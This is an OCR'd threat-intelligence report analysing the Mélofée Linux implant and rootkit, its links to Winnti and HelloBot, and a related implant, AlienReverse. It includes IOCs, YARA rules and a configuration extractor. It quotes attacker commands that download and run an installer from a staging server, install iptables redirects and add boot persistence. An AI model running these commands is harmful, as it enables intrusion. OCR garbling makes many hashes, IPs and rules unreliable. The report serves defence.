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Mélofée: a new alien malware in the Panda's toolset targeting Linux 
hosts 


We recently discovered an novel undetected implant family targeting Linux servers, which we dubbed Mélofée. 


We linked with high confidence this malware to chinese state sponsored APT groups, in particular the notorious 
Winnti group. 


In this blogpost we will first analyze the capabilities offered by this malware family, which include a kernel mode 
rootkit, and then deep dive in an infrastructure pivot maze to discover related adversary toolsets. 


Mélofée implant analysis 


We found three samples of this malware family, which we dubbed Mélofée. 


Two of these samples included a version number (20220111, 20220308), and we assess that the last sample was 
likely dated from late April or May 2022. 


All these samples shared a common code base, but showed a constant development in the following domains: 


e evolutions of the communication protocol and the packet format 
e change in the encryption of the configuration, using first RC4 and then a simple xor 


e the development of a Sel fForwardServer functionality 
e lastly, the inclusion of a kernel mode rootkit in the last sample. 


Rootkit 


The first sample we found dropped a rootkit based on a modified version of the open source projet Reptile * 


According to the vermagic metadata, it is compiled for a kernel version 5.10.112-108.499.amzn2.x86 64.The 
rootkit has a limited set of features, mainly installing a hook designed for hiding itself. 
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The rootkit hooks the functions fillonedir, filldir and filldir64 in order to not display files with names 


containing intel audio or rc.modules when listing a directory. 


It also hooks the inet ioct1 function in order to be able to communicate with its userland part using the ioct1 
system call. The kernel rootkit expects the userland component to send a value of 0xe0e0e0e during the IOCTL call, 
with 2 commands supported (these two commands being hide and show). 


The rootkit is loaded both by the installer and server components with a call to the insmod utility. 


Installer 


The implant and the rootkit were installed using shell commands downloading both the installer and a custom binary 
package from an adversary controlled server. This behaviour is similar to the installation process of Winnti Linux 
rootkits. 


wget http://173.209.62[.]186:8765/installer -O /var/tmp/installer 
wget http://173.209.62[.]186:8765/a.dat -O /var/tmp/usbd; 

chmod *x /var/tmp/installer; 

/var/tmp/installer -i /var/tmp/usbd 


The installer is also developped in c++, and takes the binary package as an argument. It then then proceeds to 
extract and install both the rootkit and the server component. The rootkit and implant paths are hardcoded to 
respectively /etc/intel audio/intel audio.ko and /etc/intel audio/audio The installer inserts the 
kernel rootkit using a call to system ("insmod /etc/intel audio/intel audio.ko"), and also install the 
persistance in the /etc/rc.modules file. 


Writing to this script ensures that both kernel and implant are executed at boot time?. 
The resulting script after installation can be seen below: 


#!/bin/sh 

#Script for starting modules 

/sbin/insmod /etc/intel audio/intel audio.ko 
/etc/intel audio/audio 

#End script 


The first bytes of the package includes the offset to the payload (in little endian), which is used to correctly extract the 
kernel rootkit and the server implant. 


00000000: b07e 0000 a841 3000 7£45 4c46 0201 0100 .-...A0..ELF.... 
BEE EE EE EECHER ee o E 
EE TEE EELER 


The developper was also kind enough to includes an usage function describing the installer's options: 


void usage (undefined8 param 1) 


printf("Usage: «$s» [options] Wn",param 1); 


jonbliess IL cue Remove"); 

PUESIA -i <data file> Tostal ayy 

puts (" =d Run in background"); 
puts (" E Show help"); 

return; 


Configuration management 


The configuration is encrypted using the RC4 algorithm in the two early samples, and with a simple xor with a single 
byte key (0x43) in the undated sample. 


The configuration format has changed between the samples, the first one containing all elements in encrypted form, 
and the last one with only the C&C domain encrypted. 


Example of decrypted configuration: 
1:www.data-yuzefuji[.]com:443:5 


This configuration contains the following elements: 
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The socket type (0x1 being TCP) 

The C&C domain 

The communication port 

The sleeptime in minutes between requests 


Persistance mechanisms 


The implant has two mechanisms of persistance, depending on its running privileges. If it runs as the root user, it 
tries to write a line containing sh -c IMPLANT EXECUTABLE NAME »/dev/null 2»&inthe files 


/etc/re.local or /etc/rc.d/rc.local. 


If it runs as a simple user, it will try to install its persistance in the following files: 


* /home/CURRENT USERNAME/.bash profile 
* /home/CURRENT USERNAME/.bash login 
* /home/CURRENT USERNAME/.profile 


The rootkit installer will insert the persistance for the kernel module in the /etc/rc.modules file. 


Supported commands 


The commands supported by the implant have evolved between the samples, showing current development of the 
backdoor. 


The first two versions: 


Command ID Capability Comment 

0x103 ping back Sent by the client 

0x1 uninstall Kill the current process and removes the persistance 
0x2 update and relaunch Overwrite the current running file and relaunch 

0x3 launch new command thread Creates a new socket for interaction 

0x4 write file 

0x5 read file 

0x6 launch shell 

0x7 create socket 0x0: TCP, 0x1: TLS, 0x2: UDP 

0x10 send_local_information Hostname, date, current UID, implant version number, ... 
0x50001 list directory 

0x50002 create directory 

0x50003 not implemented 

0x50004 delete directory Wrapper over system("rm -fr %s) 


Last version: 


Command ID Capability Comment 

0x10005 reset_timer 

0x10002 clean_and_exit 

0x10004 create_socket Create a bidirectional socket, probably used for proxying 
0x40001 list_directory 

0x40002 delete_directory Wrapper over system("rm -fr %s 

0x40003 rename 

0x40004 create_directory 

0x40005 write file 

0x40006 read file 

0x50001 exec command with output 

0x70001 write integer to file Purpose unknown, probably used for sleeptime 
0x60001 launch shell 

0x90001 no op 


Communication protocols 


The communication protocols have evolved in the three analyzed samples, however three socket types are 
implemented: 


* TCPSocket (type 0x0) using raw TCP, with a custom packet format described below; 
* TLSSocket (type 0x1), using a TLS encrypted channel to exchange with the C&C server; 


* UDPSocket (type 0x2), using the KCP protocol 3 to send data. It should be noted that the KCP protocol is a 


public communication library, and is also used in several malware families such as Amoeba ^ or CrossWalk 5. 
e Some leftover code seems to indicate that there could be a third type 0x3 for HTTP based communications, but 


it was not implemented in the analyzed samples. 


While the data is not encrypted in any form in two of the samples, in the last one it is encrypted using the RC4 
algorithm with a hardcoded key ( \x01\x02\x03\x04 repeated 4 times). 
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The packet formats used by Mélofée are the following: 


SERuotEPaeket?022 0/0 
unsigned int dwCommand; 
unsigned int dwCommandResult; 
unsigned int dwUnknown; 
unsigned int dwDataSize; 
char [| clear text data; 


struct Packet202205 ( 
unsigned int dwUnknown; 
unsigned int dwRandoml; 
unsigned int dwRandom2; 
unsigned int dwCommandResult; 
unsigned int dwCommandID; 
unsigned int dwCommandSize; 


char Il encrypted data; 


SelfForwardServer and listening server 
In the latest sample, a new functionality was implemented, named SelfForwardServer. 


Depending on a configuration flag, the implant can install iptables rules to redirect TCP network traffic from port 
57590 


The steps to install these rules are the following: 


* First a new NAT chain named is created XFILTER using the following command: iptables -t nat -N $s 

e A redirection rule is added for the port in this NAT chain:iptables -t nat -A $s -p tcp -j REDIRECT 
--to-port $d 

e Save the recent connections from port 45535 with the name ipxles:iptables -t nat -A PREROUTING 
-p tcp --sport 45535 -m recent --set --name %s --rsource -j ACCEPT 

e Redirects recent ipxles connections to the NAT chain: iptables -t nat -A PREROUTING -p tcp -- 
dport $d --syn -m recent --rcheck --seconds 300 --name $s --rsource -j $s 

e Finally, the host is instructed to accept network traffic on the port 57590 using the command iptables -I 
INPUT -p tcp --dport $d -j ACCEPT 


It should be noted that while the Sel fForwardServer was deactivated in the configuration, the sample embedded 
both a self-signed certificate generated on 2021-06-03 and the corresponding private key to be used for securing 


communication in Server mode. 


Some of the underlying code is also present in the two earlier samples (as documented by leftover RTTI information), 
and three types of server were available: 


* TCPServer (type 0x00) 
* TLServer (type 0x1) 
* UDPServer (type 0x2) 


One interesting tidbit of this code is hidden in the receive function of the TLSServer (at address 0x42957a in the 
undated sample). When the 4 first bytes received by this function using the recv library call are 03 01 d3 76,a 


flag affecting the creation of the subsequent socket is set. However, we could not identify precisely the purpose of this 
magic. 


Because of the presence of unused code, and the evolutions between the samples, we assess that the Server and 
SelfForwardServer are currently under development by the attackers. 


Another pokemon inside the attacker's toolset 


We analyzed the infrastructure used by the attacker using pivot on both public and private datasets. We assess that 


this malware family is probably linked to the Amoeba ant Winnti Kë 


state sponsored threat groups. 
The infrastructure for the Mélofée implants are linked to the following tools: 


e Some of the servers were tracked by our Cyber Threat Intelligence as ShadowPad C&C servers; 
e Other servers were linked to both Winnti and HelloBot tools; 
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e We also saw related domains used as C&C servers for tools like PlugX, Spark®, Cobalt Strike, StowAway 10 
and the legitimate toDesk remote control tool; 


e Lastly, the attacker also probably used the ezXSS 11 tool, but we could not confirm why. 
Hellobot 


HelloBot is a malware family also targeting Linux hosts and is known to be used by APT groups such as Earth 


Berberoka 9. While pivoting on the Mélofée infrastructure, we found a common IP with an HelloBot sample, which 
provided another point to dig in. 


We found several samples of this malware and developped a custom configuration extraction script (provided in the 
annexes of this blog post). 


Using the configurations extracted, we also were able to find strong infrastructure links between HelloBot and Winnti, 


for example both used a subdomain of gitiab[.]comand cloudflare [.]com as C&C servers. 


Probable links with Winnti 


The response issued by the C&C server at the IP address 173.209.62.186 on the port 443 could be uniquely 
linked to another domain dev. yuanta. dev. This server was known to be used to stage archives containing an 


installer for the Linux version of the Winnti rootkit ". 


We also downloaded several samples of this malware family, extracted the configuration (using the script provided by 


Chronicle), and found several common domains between HelloBot and Winnti, such as cloudflare[.]com and 


gitlab[.com. 
Analysis graph 


Using the previous datapoints, we generated an infrastructure graph to draw the relations between the samples. 
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We assess with high confidence that HelloBot, Winnti and Mélofée are all related and were used by Chinese state 
sponsored attacker groups during at least all of 2022. 


Alien 
During our analysis, we discovered another Linux implant dubbed AlienReverse. 
This code was architectured in a similar manner as Mélofée, however there are several crucial differences: 


* The data of the communication protocol was encrypted using pel_decrypt and pel encrypt from the 
Reptile project 1. 
e The command IDs were different, as can be seen below 


1 13 


e The tool included several other public tools, such as EarthWorm ? and Socks proxy ~. 


There were however some common points between Mélofée and AlienReverse 


e Both implants were developped in C++ 
e Both implants used a file with a fixed ID in /var/tmp/%s.1ock to ensure only one implant is running (this 


code was found in public 14, but seems rarely used in the wild) 
* This implant implemented a similar mechanism for limiting working hours (defined as worktime) 


The command supported by this implant were the following: 


ad oda Capability Comment 
0x110010  CmdBroadcast Send encrypted data over the socket 
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Eelere Capability Comment 


0x110011  CmdOnRainUninstall Unimplemented 


GTA, imois Send local information such as hostname, date, and current UID to the 


server 
GE, er Supports several subcommands such as openFile, CreateDir, FileEnum, 
FileDownload, ... 
0x110062 ScreenSnapshot Unimplemented 
0x110063  CmdOnTaskList Unimplemented 


0x110064  CmdOnShellCommand Launch interactive shell 
0x110065  CmdOnShellactive  Unimplemented 


0x110066  CmdOnServiceList Unimplemented 


Launches Earthworm to perform the port mapping, supporting a scanning 
0x110068  CmdOnPortMapping mode with another alienReverse implant used as a proxy. Also implements 
the management of a socks proxy 


0x110073 ` CmdOnKbdRecord Unimplemented 
0x110075  CmdOnWorkTime Writes the expected runtime hours in the file /tmp/worktime 


The packet format used by the communication protocol is very similar to the one used by Mélofée: 


struct AlienComzPacket ( 

unsigned int dwTickCount; 

unsigned int dwMagicl; // 0xa003001 

unsigned int dwMagic2; // 0x10000137, also used to indicate if the packet has 
data 

unsigned int dwCommandID; 

unsigned int dwTotalSize; 

unsigned int dwEncryptedSize; 

unsigned int ; 


char [] data; // The data encrypted using pel encrypt 


While we initially thought that this sample was related to the Mélofée family, we came to the conclusion that it is a 
distinct tool. However, we decided to include it in this report because it was used as a starting point in this 
investigation, and we think that sharing it to the public is important. 


We also could not link it to known adversary groups, but we assess that it is likely used in targeted attacks. 
Conclusion 


The Mélofée implant family is another tool in the arsenal of chinese state sponsored attackers, which show constant 
innovation and development. 


The capabilities offered by Mélofée are relatively simple, but may enable adversaries to conduct their attacks under 
the radar. These implants were not widely seen, showing that the attacker are likely limiting its usage to high value 
targets. 


Annexes 
IOCs 
Hashes 
SHA256 FileType Comment 
3ca39774a4405537674673221940e306c£5e8cd8dfa1f5fc626869738a489c3d Text file Installation commands 
ELF x64 
75850934b7adddb794951d15a6ddcacelfa523e814aa40b55e2d071cf2df81f0 Installer 
executable 
ELF x64 ; 
a5a4284£87£d47559474626040d289£fabbal066fae6c37bd7de9dabaf65e87a Implant version 20220111 
executable 
ELF x64 


2db4adf44b446cdd1989cbc139e67c068716£b76a4606547916ee£7a959627009 Implant version 20220308 


executable 
ELF x64 Implant with rootkit and 
executable without version number 


Container of rootkit and 
£3e35850ce20dfc731a6544b2194de3f35101ca51de4764b8629a692972bef68 Binary file implant probably used for 


installation 


8d855c28744dd6a9c0668ad9659baf06e5e448353£54d2£99beddd21b41390Db7 


330a61fa666001be55db9e6£286e29cce4af£7£79c6ae267975c19605a2146a21 PE x64 Cobalt Strike beacon 


executable 
PE32 
executable 
ELF x64 
executable 


7149cdb130e1a52862168856eae01791cc3d49632287£990d90da0cce1dc7c6b9 Cobalt Strike beacon 


a62b67596640a3ebadd288e733£933££581cc182246871351482bd7472655bb5 StowAway proxy tool 
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SHA256 FileType Comment 


3535f£45bbfafda863665c41d97d894c39277d£d9af1079581d28015£76669b88 ELF x64 AlienReverse implant 


executable 


2€62d6c47c00458da9338c990b095594eceb3994b£96812c329F8326041208e8 ELF x32 HelloBot implant 


executable 


407ab8618fed74fdb5fd374f3ed4a2fd9e8ea85631be2787e2ad17200£0462b8 ELF x32 HelloBot implant 


executable 


187b6a4c6bc379c183657d8ea£c225da53ab8£78ac192704b713cc202c£89a17 ELF x32 HelloBot implant 


executable 


2801a3cc5aed8ecb391a9638a3c6£8db58ca3002e66f£11b£88£8c7c2e5a6b009 ELF x32 HelloBot implant 


executable 


6e858c2c9ae20e3149cb0012ab9a24995aa331d2a818b127b2£517bc3aa745a0 PE x64 Go downloader for toDesk 


executable 


7684eldfaeb2e7c8fd1c9bd65041070550c92a87d9e11e327309f£6c21b5e7ad97 PE x64 Go downloader for toDesk 


executable 


899ef£7681982941b233e1ea3c1a6d5a4e90153bbb2809£70ee5f6£cece06cabc PE x64 Spark implant 


executable 


UPX Packed executable 
©36ab5108491£4969512£4d35e0d42b3d371033c8ccf03e700c60£b98d5a95£8 ELF x64 (probably NPS, to 


confirm) 


ASCII text Script dropped in 
ad5bc6c4e653£88c451f6£6375516cc36a8fa03dd5a4d1412a418c91d4f9bec8 /etc/rc.modules for 


file rootkit persistance 


1f9e4bfb25622eab6c33da7da9be6c51cf8bf1a284ee1c1703a3cee445bc8cd9 ELF x64 Winnti Linux 


executable 


22£d67457274635db7dd679782e002009363010db66523973b4748d5778bla2a ELF x64 Winnti Linux 


executable 


3c1842d29a3445bd3b85be4 8 6e4 9dba3 6b8b5ad55841c0ce00630cb83386881d ELF x64 Winnti Linux 


executable 


5861584bb7fa46373c1b1£83b1e066a3482e9c10ce87539ee1633e£0£567e743 ELF x64 Winnti Linux rootkit 


executable 


378acfdbcec039cfe7287faaci84adf6ad525b201cf781db90820784c9c75c99 Shell Winnti Linux rootkit 


Script installer 


617£9add4c27£3bb91a32fee007cce01f£5a51deaf42e75e6cec3e71afe2ba967 ELF x64 Winnti Linux 


executable 


69££2£88c1£90075680d591e9655cc61eaa4709ccd8b3aa6eci5e3aa46b9098bd ELF x64 Winnti Linux 


executable 
ELF x64 


ad979716afbce85776251d51716aeb00665118f0350038d150c129256dd6fc5£ Winnti Linux 
executable 


£49f1b2cc52623624fdd3d636056b8a80705f6456a3d5a676e3£b7874 9bdd281 ELF x64 Winnti Linux 


executable 


2cla6fe08c8cbdc904809be4c120520888da7£331234d1656a268780a9be45e20 ELF x64 Winnti Linux rootkit 


executable (Azazel fork) 


JavaScript 


a37661830859ca440d777a£0bfa829b018276bb1f£81fe14D1485fa3c09£5£286 file 
l 


ezXSS payload 


Filenames 


* /etc/intel audio 
* /etc/intel audio/id 


* /etc/intel audio/intel audio.ko 


Network IOCs 


IOC Comment 
dgbyem[.]com AlienReverse C&C domain 
update[.]ankining[.]com Mélofée C&C subdomain 
www.data-yuzefuji.com Mélofée C&C domain 
ssm[.]awszonwork[.]com Mélofée C&C subdomain 
stock[.]awszonwork[.]com CobaltStrike C&C subdomain 
help[.]gitlab[.]com HelloBot C&C subdomain 
about[.]gitlab[.]com StowAway and Winnti C&C subdomain 
www[.]gitlab[.]com Unknown usage 
cloudflare[.]com CobaltStrike C&C domain, PlugX staging 
cdn[.]cloudflare[.]com HelloBot C&C subdomain 
cdn2[.]cloudflare[.]com C&C subdomain 
cdn3[.]cloudflare[.]com C&C subdomain 
cdn4[.]cloudflare[.]com C&C subdomain 
dns[.]cloudflare[.]com PlugX and Winnti C&C subdomain 
dns2[.]cloudflare[.]com Spark C&C subdomain, ToDesk staging 
dev[.]yuanta[.]dev Probable winnti C&C domain 
test[.]yuanta[.]dev Probable winnti C&C domain 


7/11 


IOC Comment 


SE Winnti C&C domain 
vt.livehost[.]live Winnti C&C domain 
56.67.208[.]192 Mélofée C&C IP 
5.61.57[.]80 Mélofée C&C IP 
47.139.28[.]254 AlienReverse C&C IP 
73.209.62[.]186 Mélofée installer staging 
73.209.62[.]187 C&C server 
73.209.62[.]188 Mélofée C&C server and Winnti staging domain 
73.209.62[.]189 C&C server 
73.209.62[.]190 Mélofée C&C IP 
EXT E CobaltStrike, * // The data encrypted using pel encryptShadowPad and 
HelloBot C&C IP 
47.243.51[.]98 StowAway C&C IP 
85.145.128[.]90 CobaltStrike and PlugX C&C IP 
03.87.10[.]100 toDesk staging 
202.182.101[.]174 PlugX C&C IP 
44.202.112[.]187 PlugX staging 
38.54.30[.139 Winnti C&C IP 
Yara rules 


rule UNK APT MelofeeImplant { 


meta: 
author = "Exatrack" 
date = "2023-03-03" 
update = "202 3=0s=03" 
description = "Detects the Melofee implant" 
(ite = emma 


sample hash = 
"a5a4284f£87£d475b9474626040d289f fabbal066faeb6c37bd7de9dabaf 65e87a, £3e35850ce20dfc731a6544b2194de3f3510 


strings! 
$str melofee implant 01 = "10PipeSocket" 
$str melofee implant 02 - "ikcp ack push" 
$str melofee implant 03 = "TLSSocketEE" 
$str melofee implant 04 = "/tmp/$s.lock" 
$str melofee implant 05 = "neosmart::WaitForMultipleEvents" 
$str melofee implant 06 = "9TLSSocket" 
$str melofee implant 07 = "7VServer" 
$str mellores implant 08 = "N5boost6detaill3sp ms deleterI13UdpSocketWrapEE" 
$str melofee implant 09 = "UdpServerWrap" 
$str melofee implant 10 - "KcpUpdater" 
$str melofee implant 11 = "SelfForwardServer" 


Sstr command parsing 071 = (3? 04/700 05 00 2?) 22 22 27 00 00) 3? 01 00 05 00 
27? 2? 37 05 QU 04 00} 

$str command parsing 02 = (3? 04 00 04 00 ?? ?? ?? ?? 00 00 3? 04 00 04 00 
72 22 39 05 00 OI 00} 

Sstr command parsing 03 = (3? 01 00 07 00 2?) 22 27 27 00 00 3? 01 00 09 00 
Be 22 mE Oe wer quer se Oil OC OG OC } 


condition: 


3 of them 


rule UNK APT Melofes Installer { 


meta: 
author = "Exatrack" 
date = W028 0s allow 
update = Eo0p5- 9. cdm 
description = "Detects the installer for melofee malware" 
score = 80 
tlp = "AMBER" 
source = "Exatrack" 
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sample hash = 


"758500934b7adddb794951d15a6ddcacelfa523e814aa40b55e2d071cf2df81f0" 


EE 


$str melofee ins 
$str melofee ins 
$str melofee ins 
$str melofee ins 
$str melofee ins 
$str melofee ins 
$str melofee ins 
$str melofee ins 


$str melofee ins 


$str melofee ins 


condition: 


any of them 


rule UNE APT Alien Implant { 


meta: 


related 


author = "Exatrack" 


date = 
update = 


to melofee" 
tlp = 
sample hash = 


"CLEAR" 


EEN 
EE 
description - "Detects an unknown implant from AlienManager family, 


"3535f45bbfafda863665c41d974894c39277d£d9a£1079581828015£76669588," 


strings: 


localAddr-$s localPort 


--reverse-password-1 


$str alien 01 
$str alien 02 
$str alien 03 
$str alien 04 
$str alien 05 
$str alien 06 


$str alien 07 


$str alien 08 
$str alien 09 
$str alien 10 
$str alien 1 
$str alien 1 
$str alien 1 


$str alien 1 


$str alien 1 
$str alien 1 
$str alien 1 


1 
2 
3 
4 
2 
$str alien 15 
6 
7 
8 
9 


$str alien 1 
$str alien 20 


condition: 


any of them 


ATT&CK Techniques used 


"[+] Connect Sa Successed,Start Transfer..." 

"Alloc buffer to decrypt data error, length == $d." 

"pel decrypt msg data error, error" 

"encrypt data error, length -- $d." 
"DoRecvOverlapInternal error!" 

"Socks Listen port is $d,Username is %s, password is %s" 


"Start port mapping error! remoteAddr-$s remotePort=%d 


coti 


3456" 


"OnCmdSocksStart error!" 

"The master isn't readable!" 
"ConnectBypassSocks proxy:$s:$d error!" 
"ConnectBypassSocks to $s $d" 

"now datetime: %d-%Sd-%d $d:$d:$d" 

"Not during working hours! Disconnect!" 


"Example: ./AlienReverse --reverse-address-192.168.1.101 


"Not during working hours! Disconnect!" 
"SocksManager.cpp" 
Noconnect()mPnEappNconnecis 

"They send us $hhX $hhX" 


"your input directory is not exist!" 


"Send data to local error ==> %d.\n" 


T1583.001 - Attackers acquired servers for staging and command & control 
T5183.004 - Attackers acquired domains 

T1071.001 - Attacker uses application layer protocols as C2 

T1587.001 - Adversary develop custom malware to achieve its attacks 
T1037.004 - Adversary uses RC scripts as persistance 


maybe 


taller 0l = "#Script fon starting modules” 

cal Tern02 = i ee Eesen ene 

caller 09 = /etc/Emteauds cA 

taller_04 = "rm -fr /etc/rc.modules" 

caler (05) = Waal aoe Install" 

taller 0G = “eteate home folder faded" 

taller (Uy = Wereate se@@iehelic miiia neuro? 

tallien (Otc) Weeer erede Piila seeurl ro 

teer (9€) = Mision Bons t Jo! ewy Si mies (oxo WAN ebe Owie 
taller 10 = "Unkown option %c\n" 


:80 
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T1059.004 - Attacker uses Unix shell commands and scripts 

T1132.002 - Non standard encoding using KCP 

T1573.001 - Attacker uses RC4 to encrypt its C2 traffic 

T1083 - File and directory discovery 

T1592.002 - Attacker discovers the installed version of the Linux distribution 
T1564.001 - Adversary hides the files using a rootkit 

T1562.003 - Adversary disables the shell history when executing a command 
T1070.004 - Adversary can remove the implant, the rootkit and its configuratin from the system 
T1599.001 - Adversary can modify thze firewall rules of the compromised host 

T1095 - Adversary can use UDP as a communication layer 

T1571 - Adversary can use alternative ports for communication 

T1027.002 - HelloBot implants are packed using UPX with the configuration appended 
T1027.007 - Adversary payloads are stripped 

T1588.001 - Adversary may buy or download malware 

T1588.002 - Adversary may buy or download tools such as Cobalt Strike 

T1057 - Adversary may list the processes executing on the compromised host 

T1572 - Adversary may tunnel network communications 

T1090 - Adversary may use a connection proxy for accessing internal ressources 
T1014 - Adversary uses a rootkit 

T1608.001 - Adversary uploads its malware on its infrastructure for deploying 
T1608.002 - Adversary uploads its tools on its infrastructure 

T1082 - Adversary gets detailed information about the compromised host such as the operating system version 
T1497.003 - Adversary uses time-based methods to avoid detection 


HelloBot configuration extraction script 


#!/ 
TEE 


"mnm 


"mnm 


usr/bin/env python3 
ncoding: utf-8 


Hello Bot configuration extractor 


(c) 2023 Exatrack 


import sys 


import argparse 


import struct 


def decrypt config (config): 


"mm 


Decrypts hellobot configuration 
"nn 
kel cia = 0 
opút = I] 
key = b'ecfafeab6ee7d642' 
for index, car in enumerate (config): 
Dus E key [index%len (key) ] 
dec car = bVarl ~ car 
Cleat = car 
out.append(dec car) 


return bytes (bytearray (out)) 


def get config (data): 


"mm 


Extract the pointer to the configuration 
nun 
offset = struct.unpack('I', data[-4:]) [0] 
if offset > len(data)-4: 
print("[!] Error, cannot find offset, probably not a packed Hellobot 


sample") 


raise IOError 
config = data[-offset-4:-4] 
if Joy! [puretrser]] € in config: 
print("[x] Success, found hellobot configuration") 


return -offset-4, config 
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def extract hellobot (fname): 


packed data - open(fname, 'rb').read() 


offset, config - get config(packed data) 
to unpack - packed data[:offset] 

with open(f"[fname] config", "wb") as of: 
of.write (config) 


with open(f"(fname] config decrypted", "wb") as of: 
of.write(decrypt config (config) ) 

with open(f"{fname} packed", "wb") as of: 
of.write(to unpack) 


def main(): 


parser = argparse.ArgumentParser(description-sys.modules[ name ]. doc ) 


parser.add argument("filename", help-"The filename of the sample to unpack") 
args = parser.parse args) 
extract hellobot (args.filename) 


alae name == " main ": 
main () 
1. https://github.com/f0rb1dd3n/Reptile + + 


. https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/5/html/deployment_guide/s1-kernel- 


modules-persistant + 


. https://github.com/skywind3000/kcp «^ 
. https://i.blackhat.com/Asia-22/Thursday-Materials/AS-22-LeonSilvia-NextGenPlugXShadowPad.pdf «^ «^ 


. https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-4 1-backdoors-old- 


and-new/ < 


. https://documents.trendmicro.com/assets/white papers/wp-operation-earth-berberoka.pdf — + 

. https://medium.com/chronicle-blog/winnti-more-than-just-windows-and-gates-e4f03436031a + + 
. https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan + 

. https://github.com/XZB-1248/Spark <+> 

. https://github.com/ph4ntonn/Stowaway «^ 

. https://github.com/ssl/ezXSS «+ 

. httpz//rootkiter.com/EarthWorm/ +> 

. https://github.com/fgssfgss/socks proxy < 


. https://blog.csdn.net/weixin_29100927/article/details/116577862 + 


11/11 


